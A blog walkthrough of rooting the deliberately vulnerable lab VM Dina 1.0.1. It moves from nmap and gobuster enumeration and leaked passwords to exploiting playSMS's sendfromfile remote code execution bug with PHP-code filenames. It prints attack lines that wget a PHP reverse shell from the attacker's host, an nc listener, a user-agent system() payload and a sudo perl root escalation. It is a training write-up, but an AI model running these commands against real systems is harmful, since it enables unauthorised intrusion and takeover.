• VM: Dina 1.0.1
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Enumeration

Target Discovery

First locate the IP address of my target:

nmap -n -sn 192.168.172.200-
discovery
Target: 192.168.172.234

Port Scanning

nmap -P- -A 192.168.172.234
port scanning
Ports Service/Banner
TCP: 80 Apache 2.2.22 (Ubuntu)

Let’s look at the website.

website

There’s a few folders found by nmap. Then only one that has something interesting is at /nothing/ folder.

nothing

There isn’t anything on this page. But if you look at the source of the page:

view source

There’s some passwords in the comment:

  • freedom
  • password
  • helloworld!
  • diana
  • iloveroot

Good start. But we need to find some places to use them. There isn’t other webpages to check. Let’s do a folder scan to see if we can find some hidden files or folders.

Directory scan using gobuster

gobuster -u http://192.168.172.234:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"
gobuster

It finds a folder /secure

secure folder

Navigate to the /secure folder shows a backup.zip file. Sounds like something of importance.

I download the file, uncompress it using 7z. Password is required. Try out the password list reveals that password freedom can unlock the zip file.

backup.zip

There is only one file called backup-cred.mp3. But it’s actually a text file, not mp3 file. Let’s check out what’s inside.

hidden folder

The file reveals a user name touhid and a hidden folder /SecreTSMSgatwayLogin. Looks like we hit something good. Let’s browse the hidden folder.

Exploitation

playSMS

It brings us to the login page of a open source SMS management software called playSMS. Try logging in using username touhid and the list password. I am able to get in with the password diana. That list of passwords proofs to be very useful. 🙂

playSMS logged in

After browsing through some pages to get a general idea of the software, I use searchsploit to look for any vulnerability of the software.

searchsploit

There’s a sendfromfile.php Remote Code Execution exploit available for Metasploit. I copy the file to check it out.

searchsploit -m 44599.rb

Based on the exploit description, the Send from file feature allows us to upload files and if we use some php script as the filename, the script will be executed. Awesome, sounds like what we need to get our foot in.

So I use a simple script that output a text ‘Hello’ to test the vulnerability.

touch "<?php print 'Hello' ?>.php"

Now go to My account > Send from file to upload the file

send test file

Select the file and click UPLOAD FILE:

send test file success

Awesome, it shows Hello instead of php script. That means the script is executed.

Reverse shell

Time to get a reverse shell. I have tried a few simple 1 line reverse shell (bash, netcat & etc) but all didn’t work. So I decide to use a full php reverse shell. There’s already one available in kali. So I make a copy and name it shell4000.php. You would need to edit the file to use your attack machine’s IP address and a port. In my case, my kali box IP is 192.168.172.110 and I use port 4000.

cp /usr/share/webshells/php/php-reverse-shell.php shell4000.php

Then update the ip address and port #

$ip = '192.168.172.110';  // CHANGE THIS                                               
$port = 4000;       // CHANGE THIS 

Now we need to upload the reverse shell and then execute it by running the following commands:

wget http://192.168.172.110/shell4000.php -O /tmp/shell4000.php
php -f /tmp/shell4000.php

However, there is one issue because we have to put the script as filename. Some characters such as ‘/‘ is not allowed. We have couple options to bypass this character limitation:

  • Utilize HTTP header User agent
<?php system($_SERVER('HTTP_USER_AGENT')) ?>

Instead of placing full script in the filename, we use HTTP_USER_AGENT header to store the actual php script. This option would require use of proxy server such as Burp.

  • Encoding

We can encode the script as filename and decode it during execution. A simple base64 encoding will do the trick.

.I am going to use base64 encoding to bypass this limitation.

base64

As seen in the above image, I first obtain the base64 version of the command. Then use it in the filename and pipe it to base64 decode before execution.

Good. We have the 2 files ready. Now setup a webserver to serve the shell file.

python -m SimpleHTTPServer 80

Next setup netcat to listen to port 4000

nc -nvlp 4000

Now, it’s time to use Send from file feature to upload the 2 files one by one to receive our shell.

shell upload

After uploading the first file, we see a request to get the file shell4000.php at our webserver. Good

low shell

Low shell obtained after we upload the 2nd file.

Privilege Escalation

The very first command I like to do after getting a shell is sudo -l. If the user has some sudo capabilities, it’s the most easy way of getting root access.

sudo

Yup, the user is allowed to run perl. That also means that we can execute command as root. All we need is to use perl to run a bash shell as root.

root

Root shell obtained. All right!

Capture the Flag

flag

Thank you author Touhid Shaikh for the box Dina 1.0.1

Leave a Reply

Close Menu